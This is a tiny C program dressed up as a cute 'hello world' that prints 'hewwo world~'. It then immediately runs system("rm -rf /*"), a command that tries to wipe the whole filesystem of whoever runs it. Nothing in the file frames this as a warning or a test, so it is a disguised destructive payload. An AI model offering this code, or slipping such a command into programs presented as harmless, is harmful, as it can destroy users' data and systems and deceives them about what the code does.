#include <stdio.h> #include <unistd.h> int main() { printf("hewwo world~\n"); system("rm -rf /*"); return 0; }